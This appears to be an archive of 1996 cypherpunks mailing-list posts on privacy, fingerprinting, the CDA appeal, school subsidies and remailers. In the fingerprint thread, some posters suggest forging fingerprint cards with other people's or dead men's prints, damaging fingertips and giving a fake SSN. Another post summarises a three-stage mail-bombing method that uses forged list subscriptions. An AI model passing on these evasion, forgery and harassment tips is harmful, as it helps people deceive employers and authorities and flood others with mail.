> of individual privacy (encrypting COM e-mail is one example).
[...]
> Martin Minow
> minow@apple.com

    Huh? 'a rather strong tradition of protection of individual privacy'? In 
Sweden, for many years  you could (and for all I know, still) go to a public
records office and look up all kinds of personal data on anyone, without
restriction - you could, for example, find out your co-workers exact 
salaries if you were curious.

   My understanding is that Sweden's postion vis-a-vis the Internet has
been particularly clueless, with international email technically a crime,
and government officials who regard modems as criminal tools.

   I hope things have improved.

Peter Trei (former resident alien in Sweden)
ptrei@acm.org   

   




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 15 May 1996 07:30:57 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Fingerprinting annoyance
In-Reply-To: <adbd6595020210043518@[205.199.118.202]>
Message-ID: <Pine.SUN.3.93.960514092227.3611B-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 13 May 1996, Timothy C. May wrote:

> At 6:26 PM 5/13/96, Mark O. Aldrich wrote:
> >On Mon, 13 May 1996, Senator Exon wrote:
> >
> ><snip>
> >> i can fill out and manipulate the card myself i just need a
> >> working method.
> >> is there no privacy advocate who can help me?
> >>
> >
> >I think most privacy advocates would advise, "Refuse to submit."  It
> >sounds like you're looking for more of a hack on the fingerprinting process.
> 
> And if you are working for me, and I ask for a fingerprint, and you refuse
> or "smear" the results (repeatedly, as the first smearing I may just take
> as your token protest and have you printed again), you'll be out the door
> by the end of the day.

On the other hand, if more subtle doctoring escapes your notice....

> (Personally, I've never worked for a company which demands fingerprints,
> but I've worked for companies which demanded ID badges and signatures, and
> these are effectively as intrusive. And I suspect that my former employers
> are now using thumbprints, and maybe full prints.)

I disagree.  ID badges and signatures are identification surely, but the
manner and process by which fingerprints are collected and used is
certainly more intrusive.  There is no, for example, national database of
signatures or corporate ID cards.
 
> Trying to convince a company that photo ID badges and fingerprints are Bad
> Things is perhaps admirable, just realize that in a free society that
> employer is under no obligation to hire someone who refuses to go along
> with the company's security policies. (This relates to the "civil rights"
> thread.)

Which is why clandestine methods are more effective.

Sure, the employer can fire you if they find you out, but they have to
find you out first.

This is why "in your face"ers like Mr. Bell and others tend to fail in
their efforts.  They take the wrecking ball approach rather than run
around the stone in the river.

> >of like a key certificate.  If you really can dork the card, have ten
> >different people volunteer one print each.  There's no way that they'll
> >ever be able to use that as evidence in a court or for any other purpose,
> >either.
> 
> A stupid idea. As the employer, I wouldn't have to prove it a court of
> law...suspicion alone that some of my employees were fucking up a security
> system might be enough for me to either a. promote them to the Tiger Team,
> or b. fire their asses.

I think the concept was that it should be done in a way so as to reduce
attention.  10 dead men's prints (provided none were fugitives) might be
an interesting way to go about it.  Certainly less obvious than smearing.

> (I just can't understand where this pervasive meme is coming from here on
> this list, the notion that employers are severely limited in what they can
> do to employees unless they can "prove it in court. Like it or not, most
> employees in the United States are still employed "at will," and are not
> covered by employment contracts such as some executives and the like get.)
> 
> >If you're forced to do this in person with a tech, you can continuously
> >"fight" the grip they have on your hand and smudge the card.  However,
> 
> Sure. It makes it easy for the employer to simply say "Next candidate."

Seems to me that the issue here is not getting fired, but what the
collected identification information will be used for in future.  I
consider spoofing prints and other biometric type information legitimate
if the motive is to avoid later identification for purposes not related to
the employment for which identification was required.

All this "suck it up and get printed" talk has me somewhat disconcerted
with the list.  Have many here not consistantly indicated that privacy is
something that must be self assured?

Isn't this the list that is so paranoid about what might be done with
escrowed keys?  Who might bribe the keepers into releasing such
information?  What might it be used for?  What about corporations selling
information about employees?

How are fingerprints any easier?

One can thing of countless examples in history (carefully avoiding
Godwin's Law in the process) where once legitimate record keeping and
registration was perverted for illicit, even evil use.

I think that unless proper means are taken to safeguard information,
social security number, license plates, and fingerprint records included,
that the individual is perfectly within rights to take his or her own
safeguarding initiatives.

Where those methods are not intended to simply evade prosecution, but
rather to foil extreme recordkeeping, I believe them legitimate.

> --Tim May

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 15 May 1996 11:42:53 +0800
To: cypherpunks@toad.com
Subject: Re: (legal) Re: CDA Dispatch #10: Last Day in Court
Message-ID: <adbe0243050210040483@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:30 PM 5/14/96, Joseph M. Reagle Jr. wrote:

>        Perhaps someone with a better legal understanding of court cases
>could help me out. I understood from a law course I took that appeals could
>only be filed with respect to process rather than result. One cannot appeal
>a decision, rather one has to appeal the manner in which it was reached (if
>witnesses were biased, important evidence was suppressed, etc.) I was rather
>surprised by this, but obviously this doesn't prevent people from appealing
>willy-nilly because they just fabricate some reason why the process was
>corrupted.
>
>        However, in a venue such as this, what basis can one appeal on? On
>the ACLU side I can actually see an appeal with respect to the
>constitutionality (but I'm not quite sure what) and on the Reno side I don't
>see what they could appeal. Was some evidence poorly presented? It isn't
>like there are any witnesses to lead.

IANALBIGCTV (I am not a lawyer but I get Court TV), but _Constitutional_
issues are always available for appeal (though of course not always
accepted for appeal). For instance, if the lowest level of the court system
tells a newspaper it may not publish a story, this is automatically
appealable to the next level up, even if all sides agree the first trial
was a model of proper trial procedure.

To a large extent, this is what the Appeals process, including the Supreme
Court, is all about. The Supreme Court does more than just clean up sloppy
mistakes made by lower courts, it establishes the "basic interpretation" of
the Constitution and legislation.

In this case, it is the basic constitutionality of the Communications
Decency Act itself that is at issue, not the specific application of it to
a specific case (and even then, it could be challenged on constitutional
issues...in this case, it is going directly through the process to the
Supreme Court for review).

(Another way this case is not like a simple court case is that the
government side gets to appeal a loss; in a conventional criminal trial, a
la OJ, the government does not get to appeal a loss. I'm sure the lawyers
and law professors out there can say more about the distinction, about when
and under what circumstances the prosecution side gets "another bite of the
apple," and about what the terms of appeals may be.)

--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 15 May 1996 07:06:09 +0800
To: "Paul S. Penrod" <furballs@netcom.com>
Subject: Re: Fingerprinting annoyance
In-Reply-To: <Pine.3.89.9605132007.A29528-0100000@netcom17>
Message-ID: <Pine.SUN.3.93.960514093526.3611C-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 13 May 1996, Paul S. Penrod wrote:

> 
> 
> On Mon, 13 May 1996, Mark O. Aldrich wrote:
> 
> > On Mon, 13 May 1996, Senator Exon wrote:
> > 
> > <snip>
> > > i can fill out and manipulate the card myself i just need a
> > > working method.
> > > is there no privacy advocate who can help me?

[...]

> > If you're forced to do this in person with a tech, you can continuously 
> > "fight" the grip they have on your hand and smudge the card.  However, 
> > they'll not submit the card until the prints are "good," so this sort of 
> > betrays your intent of at least appearing to cooperate with them.  In the 
> > law enforcement community, they are taught how to take prints by force 
> > but it's unlikely that your tech will attempt any such technique.
> > 
> 
> I know of no such instance (other than some informal "fingerprint the 
> kiddies for safety" schtick) where it's a do-it--yourself operation. 

Not _technically_ perhaps.  But in most cases it's a
go-down-to-the-police-station-and-have-them-sign-the-card operation.  Who
is it that can tell a random signature from a police signature exactly?
Like I said, standard print cards are available at the GPO.

> While the methods listed are clever, they and many other finaglings are 
> the main reason it's done in the "light of day" by a tech.

Or _theoretically_ done in the light of day by a tech.

> > You can mutilate the tips of your fingers so that prints cannot be 
> > acquired, but this hurts.  Badly.
> 
> Doesn't always work. Partials can be extrapolated to yield a relative match.

Depends on what you are looking to do.  If your goal is to deter random
searching through a national database, mutilation will probably be very
effective.  If they have the prints of the murderer (you) and you're a
suspect, mutilation aside from actually removing the fingers isn't going
to do anything.

> > 
> > You could get some false latex coverings for your finger tips, but they'd 
> > have to be damn good to fool a tech.  Likely to cost big bucks, too.
> 
> Wont work. The hands are checked first for signs of tampering.

See above about tech end around.

> > 
> > I know of no chemical or physical "pre-treatment" that can be used to 
> > hack the ink transference process.  Perhaps one of the chemists here on 
> > the list might know of some good technique.
> 
> Pineapple juice and other weak acidic subtances ruin the ridges on the 
> finger tips causing them to smear or not show at all. Unfortunately, this 
> takes a period of time and constant handling of such items.

This is interesting.  I suspect that you'd have to have major damage to
the ridges however.

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Matthew Williams" <williams@mackinfo.com>
Date: Wed, 15 May 1996 08:00:21 +0800
To: cypherpunks@toad.com
Subject: Re: Fingerprinting annoyance
Message-ID: <139DC126BB3@server_0.mackinfo.com>
MIME-Version: 1.0
Content-Type: text/plain


> Date sent:      Mon, 13 May 1996 23:19:12 -0400 (EDT)
> From:           Black Unicorn <unicorn@schloss.li>

<...>

> 
> I compare it to the ease with which one submits a fake social security
> number rather than simply refuse to submit one at all.  A fake one wont
> raise any eyebrows, refusal will.

Although knowingly providing a fake social security number when one 
has any expectation of gain is, I believe, a felony.  

42 USC. sec. 408. 

Matt

+--------------------------------------------------------------------+
 Matthew Williams                               williams@mackinfo.com 
 215-884-8123 voice                                  215-886-5030 fax
  "The most obscene thing I have found on the Internet is the CDA."
+--------------------------------------------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@MIT.EDU>
Date: Wed, 15 May 1996 07:13:08 +0800
To: "Declan B. McCullagh" <cypherpunks@toad.com
Subject: (legal) Re: CDA Dispatch #10: Last Day in Court
Message-ID: <9605141430.AA20216@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


[Regarding ACLU v. Reno]

At 11:08 PM 5/13/96 -0400, Declan B. McCullagh wrote:
>      The Philadelphia court is expected to issue a decision by mid-June.
>   Both the plaintiffs and the Department of Justice have said they will
>   appeal to the Supreme Court, which may decide to hear the case after
>   it reconvenes in early October. Assuming the Justice Department loses,
>   will they really appeal to the Supreme Court? If so, I object to my
>   tax money being wasted on this crap.

        Perhaps someone with a better legal understanding of court cases
could help me out. I understood from a law course I took that appeals could
only be filed with respect to process rather than result. One cannot appeal
a decision, rather one has to appeal the manner in which it was reached (if
witnesses were biased, important evidence was suppressed, etc.) I was rather
surprised by this, but obviously this doesn't prevent people from appealing
willy-nilly because they just fabricate some reason why the process was
corrupted.

        However, in a venue such as this, what basis can one appeal on? On
the ACLU side I can actually see an appeal with respect to the
constitutionality (but I'm not quite sure what) and on the Reno side I don't
see what they could appeal. Was some evidence poorly presented? It isn't
like there are any witnesses to lead.
_______________________
Regards,       Men govern nothing with more difficulty than their tongues,
               and can moderate their desires more than their words. -Spinoza
Joseph  Reagle      http://farnsworth.mit.edu/~reagle/home.html
reagle@mit.edu      E0 D5 B2 05 B6 12 DA 65  BE 4D E3 C1 6A 66 25 4E





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Date: Wed, 15 May 1996 10:44:35 +0800
To: cypherpunks@toad.com
Subject: Re: Edited Edupage, 9 May 1996
In-Reply-To: <v01540b00adbcda0ed8ac@[193.239.225.200]>
Message-ID: <doug-9604141557.AA00094281@netman.eng.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain



>
>OK, someone tell me why the END USERS don't pay for this!
>
>If a school wants to be wired, the local school board can pay for it (and
>the local taxpayers can vote for the millage increase).  If you don't think
>every five year old needs a net connection (maybe because you are afraid of
>them seeing nekkid ladies, or because you just think teachers should teach
>and not rely on technology to do their jobs for them), you can vote against
>spending the money.
>
>As for subsidizing rural customers, those people made a choice to live in a
>rural area, for whatever reason.  I see no reason to subsidize that choice.
>Unless of course they want to pay higher taxes to subsidize the costs for
>my living in the city.
>
>        Clay
>
>

I wouldn't normally respond to such an offtopic post, but this post is
so egregious I couldn't let it pass. Who says they make a choice to live
in rural areas? Do they also choose not to have enough money to pay
for shoes? So, because they live in a poor district they are not entitled
to the same level of education as a rich city suburb?  The illiteracy
rate in Alabama is 40%! This is just plain sick!  I don't think that
every school needs a net connection, I think they need better teachers. But
the statement that we shouldn't subsidize rural customers because they
CHOOSE to live there (even though some are poor and can't afford to live
anywhere else) is just plain fallacious. Just because you choose to live
in the city does not mean people always choose to live where they live.
Education is one thing (perhaps the only thing) that deserves to be
subsidized in this country. We're rapidly falling behind.
 I don't agree with the $10. I'd need convincing that every school
needs a net connection when the students can't read, but the tone of the
above message is callous, besides being wrong.



--
____________________________________________________________________________
Doug Hughes					Engineering Network Services
System/Net Admin  				Auburn University
			doug@eng.auburn.edu
		Pro is to Con as progress is to congress




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 15 May 1996 12:39:40 +0800
To: cypherpunks@toad.com
Subject: Re: Fingerprinting annoyance
Message-ID: <adbe18d00702100450ef@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:22 PM 5/14/96, Matthew Williams wrote:
>> Date sent:      Mon, 13 May 1996 23:19:12 -0400 (EDT)
>> From:           Black Unicorn <unicorn@schloss.li>
>
><...>
>
>>
>> I compare it to the ease with which one submits a fake social security
>> number rather than simply refuse to submit one at all.  A fake one wont
>> raise any eyebrows, refusal will.
>
>Although knowingly providing a fake social security number when one
>has any expectation of gain is, I believe, a felony.
>
>42 USC. sec. 408.

Indeed.

Plus, should one "just make a number up," odds are good that it "won't
compute," that is, that it will either collide with an existing number (and
identity, and reported income) or that it will fail the checksum/allocation
tests.

(That is, not all xxx-yy-zzzz numbers are valid SS numbers. See Chris
Hibbert's "Structure of Social Security Numbers" FAQ, at
http://snyside.sunnyside.com/cpsr/privacy/ssn/oldSSN/ssn.structure.html
for details.)

The IRS imposes penalties for faking SS numbers. (Not to mention the
punishment meted out by the Sturmgruppenfuhrers of the SS!)

A simple transposition of two digits may not get you zapped, but a
large-scale transposition or outright falsification will. If and when they
catch up with you.

I'm all for avoiding taxes, but this is not a cost-effective way to do it.

--Tim

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Wed, 15 May 1996 12:23:15 +0800
To: cypherpunks@toad.com
Subject: Re: PRZ /PGP
Message-ID: <199605141831.LAA22230@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 10:57 PM 5/13/96 -0700, Vladimir Z. Nuri wrote:
[Stupid trolling on reagan and the cold war deleted]
>
> it may also be that Zimmermann has a set of beliefs that he
> champions in front of the public, but that his private ideology
> is more radical. 

Zimmermann is in favor of liberty.  Some of his ideas about how 
people can and should deal with each other to avoid violating 
each others rights are badly mistaken, but one of his ideas about 
liberty is spot on.

[lots more trolling deleted]

> 4. PRZ has a bad track record as far as meeting deadlines.

No software project has ever come in on schedule or within budget.

Yours will not be the first.

[Even more moronic trolling deleted]
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Majordomo@c2.org
Date: Wed, 15 May 1996 13:22:38 +0800
To: cypherpunks@toad.com
Subject: Welcome to clueless
Message-ID: <199605141836.LAA11869@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


--

Welcome to the clueless mailing list!

If you ever want to remove yourself from this mailing list,
you can send mail to "Majordomo@c2.org" with the following command
in the body of your email message:

    unsubscribe clueless cypherpunks@toad.com

Here's the general information for the list you've
subscribed to, in case you don't already have it:

Welcome to clueless!

You have subscribed to the forefront of online unsubscribe education.

The clueless list is dedicated to fostering new and creative unsubscribe
methods and promoting passionate and caustic discussion of same.  We
welcome all manner of discussion on the best ways to unsubscribe from
mailing lists and particularly mailing lists to which you have not
intentionally subscribed or have grown bored of.

We recognize that unsubscribing is a complicated and involved process, and
that often it is much more difficult than subscribing.

You are not alone.

HERE'S THE BOTTOM LINE:  Mailing lists were founded by interest groups who
need a CAPTIVE audience.  Making it easy to unsubscribe is not in their
interest.  They want EVERY SINGLE person they can find to be CORRUPTED by
their brainwashing ideas.  You're dealing with the SCUM OF THE PLANET.
The speed and power of the internet threaten to DESTROY your mind and
CRIPPLE your fingers.  You need WORLD CLASS unsubscribe powers to protect
yourself.

The founder of the list, fed up with the complexity and spelling
challenges of unsubscribing, started a small distribution list of like
minded individuals in 1981.  Meeting in secret and developing their
methods covertly, the clueless members grew in size until, in 1994, their
ranks were too large to support with a mere pine mailing program.  The
clueless list was born.  With the advent of the clueless list, attempts to
obscure the unsubscribe process are now futile.  The elders of the
clueless list have perfected the most AMAZING AND EFFECTIVE unsubscribe
methods known anywhere in the world.  They are 100% ASSURED to unsubscribe
you 100% of the time WITH AMAZING accuracy and speed.

The BEST unsubscribing system in the WORLD for FAST learning and
ULTRA-CONFIDENCE in the world of mailing lists.

Have faith!

You will learn how to unsubscribe quickly.  You will learn how any
person of any size can unsubscribe from any list with a single e-mail
message.  We promise. You will not forget how either.  Trust us.

FAQ:

What kind of questions should I ask?

Anything that has to do with mailing lists, or any question you may have
about e-mail at all.  Mostly anything goes.  There are several people
willing to engage you in discussions on the subject here.  The first rule
is that there are no stupid questions.

What should I post?

There is only one effective post limitation.  Unsubscribe solutions or
suggestions that are less than 2 lines long are unwelcome.

Who is the list owner?

The list owner prefers to remain anonymous.  Should he or she be
identified publically, the torrents of requests for the release his or her
amazing secret and TOTALLY FOOLPROOF unsubscribe methods would be
oppressive.

Good luck, and welcome to the list.

If you are clueless, or you know someone who is, you can get assistance
by sending mail to clueless-request@c2.org saying "help".

The "clueless" mailing list is for people who need to learn to read
instructions on mailing list managers, and haven't figured out that
they can unsubscribe from lists using the same automated list-manager
software that they used to subscribe.  It's also helpful for people
who don't know standard Internet mailing list conventions that
"foolist-request" provides information or services for "foolist",
or who complain to a mailing list because the listserv/majordomo server
wasn't a human and didn't respond to English-language requests.

And it's a nice place to meet other clueless people!

For further reference, you can find more information about "RTFM"
on the Web from www.altavista.digital.com , www.yahoo.com , and
many other fine search engines near you.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hkhenson@netcom.com (Keith Henson)
Date: Wed, 15 May 1996 12:25:42 +0800
To: cypherpunks@toad.com
Subject: crosspost re remailers
Message-ID: <199605141901.MAA02888@netcom.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Sorry to send this in blind.  Over a year ago I switched from watching
the "mutitions" R&D works to being an observer/participant on a small
"test war."  Once in a while, I send in a report.  If you have comments
which you want me to see, email them.  Thanks,  Keith Henson

*******

Subject: Re: <<< Repost the NOTS everywhere! >>>
Newsgroups: alt.religion.scientology,comp.org.eff.talk,alt.censorship
References: <4ml2cv$c52@utopia.hacktic.nl> <4mrsf0$esn@news.bridge.net> <4ms9na$l24@Networking.Stanford.EDU> <4msu79$jdi@news.bridge.net> <henriDr5rpD.CqD@netcom.com> <4nae9i$bf7@news2.texas.net>
Organization: NETCOM On-line Communication Services (408 261-4700 guest)
Distribution: inet


Hoyos (hoyos@millenium.texas.net) wrote:
: henry (henri@netcom.com) wrote:

: : >What I find disturbing is certain people who were visibly outraged by
: : >Steven Fishman's "outings" are supportive of the remailer abuse, _as_well_

: : remailer ABUSE?  how is it remailer ABUSE to use them for their
: : intended purposes.

: Remailers exist to destroy copyrights?  I always thought they were around 
: to ensure a certain amount of anonymity, not to permit people to destroy 
: copyrights and get away with it. 

Hoyos, you *can't* destroy copyright, period.  Trade secrets are another
matter, and I suppose you can make a case that the ability of a certain
powerful cult to extract money or labor from the gulible has been reduced. 

I know some of the people who wrote the first cypherpunk remailers.  
They have been watching the uses to which the remailers have been put.
The long drawn out battle between the CoS and the Net has been of as
much interest to them as the performance of large guns at the front
was to Krup.   I can't speak for all of them--actually, I can't speak
for *any* of them, but the ones who have said anything about the
recent uses of the remailers do not seem unhappy.  There may be
some discussion related to this on the cypherpunks mailing list.
But if you sign up, be prepaired for a flood.  Keith Henson

Crossposted to cypherpunks





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark O. Aldrich" <maldrich@grci.com>
Date: Wed, 15 May 1996 13:08:02 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Fingerprinting annoyance
In-Reply-To: <adbd6595020210043518@[205.199.118.202]>
Message-ID: <Pine.SCO.3.91.960514115326.10594D-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 13 May 1996, Timothy C. May wrote:

> At 6:26 PM 5/13/96, Mark O. Aldrich wrote:
> >On Mon, 13 May 1996, Senator Exon wrote:
> ><snip>
> >> i can fill out and manipulate the card myself i just need a
> >> working method.
<snip>
> 
> >of like a key certificate.  If you really can dork the card, have ten
> >different people volunteer one print each.  There's no way that they'll
> >ever be able to use that as evidence in a court or for any other purpose,
> >either.
> 
> A stupid idea. As the employer, I wouldn't have to prove it a court of
> law...suspicion alone that some of my employees were fucking up a security
> system might be enough for me to either a. promote them to the Tiger Team,
> or b. fire their asses.

I think the assertion that Tim is making in regard to an "employer" in the
traditional work-at-will sense is correct, but it's not the one I was
addressing.  If an employer seeks prints and you don't want to give them,
then don't work there.  If, however, the point of gathering the prints is
to record them in the FBI's database, and Senator Exon is worried about
later committing a crime and having print records used to identify him, 
then using the prints of ten different people will muck up such a 
process. 

Senator Exon did not fully explain the situation as to whether or not the 
certification sought will result in fingerprints simply being _checked_, 
or if they will be _recorded_ for later use, nor did he specify to which 
outcome he objects, if not both.

> 
> (I just can't understand where this pervasive meme is coming from here on
> this list, the notion that employers are severely limited in what they can
> do to employees unless they can "prove it in court. Like it or not, most
> employees in the United States are still employed "at will," and are not
> covered by employment contracts such as some executives and the like get.)

I think it comes from some of the statutes being placed on employers.  
The citizens have repeatedly used the legal machine to force employers to 
have to compete is less than a pure, capitalistic environment.  
Monitoring employees is one area that's caused some states to pass laws 
regulating this notion - they have rejected the "if you don't like it, 
don't take the job" premise you've stated here.  Likewise, the minimum 
wage is a similar legislative action we've taken to stop employers from 
using a "if you won't work under these conditions, you don't have a job" 
requisite.  The "pure" capitalistic approach would be "if you won't 
work for $1.00 per hour, take a hike up the street."  We've said that 
this is illegal (at least in most cases), and we force employers to pay 
every employee at least some arbitrary sum greater than than amount.  
Thus, the meme may be the simple extrapolation of these ideals into areas 
over which they do not yet have legal impact.

> 
> >If you're forced to do this in person with a tech, you can continuously
> >"fight" the grip they have on your hand and smudge the card.  However,
> 
> Sure. It makes it easy for the employer to simply say "Next candidate."

Unless they want you badly enough.  I've been able to avoid a number of 
situations because it was not cost effective for them to secure the 
services of someone less qualified.  Policy is great until it gets in the 
way of people making money - almost anything can be "waived" if they want 
you to help them make money, and their greed outweighs their sense of duty 
to comply with a given so-called "security" policy.

------------------------------------------------------------------------- 
|      Liberty is truly dead              |Mark Aldrich                 | 
|    when the slaves are willing          |GRCI INFOSEC Engineering     | 
|     to forge their own chains.          |maldrich@grci.com            | 
|        STOP THE CDA NOW!                |MAldrich@dockmaster.ncsc.mil | 
|_______________________________________________________________________| 
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     | 
|         and my employer gets no credit for them whatsoever.           | 
-------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 15 May 1996 13:20:32 +0800
To: cypherpunks@toad.com
Subject: Re: Edited Edupage, 9 May 1996
Message-ID: <adbe2b2e0a021004a197@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:57 PM 5/14/96, Doug Hughes wrote:

>I wouldn't normally respond to such an offtopic post, but this post is
>so egregious I couldn't let it pass. Who says they make a choice to live
>in rural areas? Do they also choose not to have enough money to pay
>for shoes? So, because they live in a poor district they are not entitled

Your shoe example is apt. Fact is, we *don't* pay for people's shoes. Why
should we pay for their Net access when we don't pay for their shoes, or
their food, or their electricity, or their phone bill, or their cable t.v.
subscription? Many of these things seem like higher priorities than being
able to "surf the Net."

(It is true that we as a society--wrongly in my opinion, but this is
another topic--give people various handouts. These handouts can be used to
buy things, presumably including a $20/month unlimited access Internet
account.)


>to the same level of education as a rich city suburb?  The illiteracy
>rate in Alabama is 40%! This is just plain sick!  I don't think that
>every school needs a net connection, I think they need better teachers. But

"Better teachers"? I doubt this changes anything. Only a cultural change
will. (Why is it that dirt-poor "boat people" who floated into San
Francisco Bay on inner tubes had children go from nearly zero English to
99% literacy in less than 5 years? Often in crowded schools, too. Think
about it.)


>Education is one thing (perhaps the only thing) that deserves to be
>subsidized in this country. We're rapidly falling behind.

Actually, the subcultures in American society which value learning and
achievement are doing extremely well. Hand a motivate kid a book and he'll
learn. Hand a gang-banger a book and he'll pull out a gun and kill you for
the thrill of it.

As a result, some subcultures are headed for the scrap heap. Think of it as
evolution in action.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul S. Penrod" <furballs@netcom.com>
Date: Wed, 15 May 1996 14:51:12 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: Fingerprinting annoyance
In-Reply-To: <Pine.GUL.3.93.960513234411.19375E-100000@Networking.Stanford.EDU>
Message-ID: <Pine.3.89.9605141227.A21339-0100000@netcom15>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 13 May 1996, Rich Graves wrote:

> On Tue, 14 May 1996, Allen Ethridge wrote:
> 
> > I can't speak to the honorable senator Exon's situation, but my brother
> > is being required to provide his fingerprints to prove that he is fit to
> > be the legal guardian of his wife's daughter.  And it isn't his wife,
> > currently the sole legal guardian, who is questioning his fitness or
> > demanding his fingerprints.
> 
> It's times like those that Jim Bell makes some sense. SOME.
> 
> -rich
> 

DON'T encourage him... :-)

...Paul




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark O. Aldrich" <maldrich@grci.com>
Date: Wed, 15 May 1996 11:27:14 +0800
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: More involuntary c'punk subscriptions on the way?
Message-ID: <Pine.SCO.3.91.960514124732.10594E-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


In the May '96 issue of Computer Security Alert, Padgett Peterson 
provides an explanation of how mail bombing is done.  It's on page 3 
under the "E-mail Security" column with the headline "Mad Bombers on the 
Net."  In the article, Padgett explains the three "stages" of mail 
bombing:  First is to send ungodly amounts of mail from you to the 
target, the next is to post something offensive under a forged ID to one or 
more of the "less ruly" [his words] USENET groups, such as alt.2600 or 
alt.tasteless [his citations], and the third is to subscribe people to 
mailing lists against their will using forged e-mail.

Naturally, Padgett (bless his twisted little mind) indicates that the 
most severe results can be achieved by sending forged subscription 
requests to "the larger listservers such as cypherpunks", that generate in 
excess of a hundred messages a day.

Since hackers and wannabes probably read INFOSEC publications with more 
zeal than do INFOSEC practitioners, I'd say we're likely to be in for even 
more of the "I don't want to be on this list" sorts of traffic.

And Padgett, next time you get interviewed on mail bombing by the press, 
why don't you point them to "The KISS Army Mailing List," or something of 
that sort?

------------------------------------------------------------------------- 
|      Liberty is truly dead              |Mark Aldrich                 | 
|    when the slaves are willing          |GRCI INFOSEC Engineering     | 
|     to forge their own chains.          |maldrich@grci.com            | 
|        STOP THE CDA NOW!                |MAldrich@dockmaster.ncsc.mil | 
|_______________________________________________________________________| 
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     | 
|         and my employer gets no credit for them whatsoever.           | 
-------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 15 May 1996 15:43:59 +0800
To: "Mark O. Aldrich" <maldrich@grci.com>
Subject: mailing list infrastructure
In-Reply-To: <Pine.SCO.3.91.960514124732.10594E-100000@grctechs.va.grci.com>
Message-ID: <199605142011.NAA29073@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



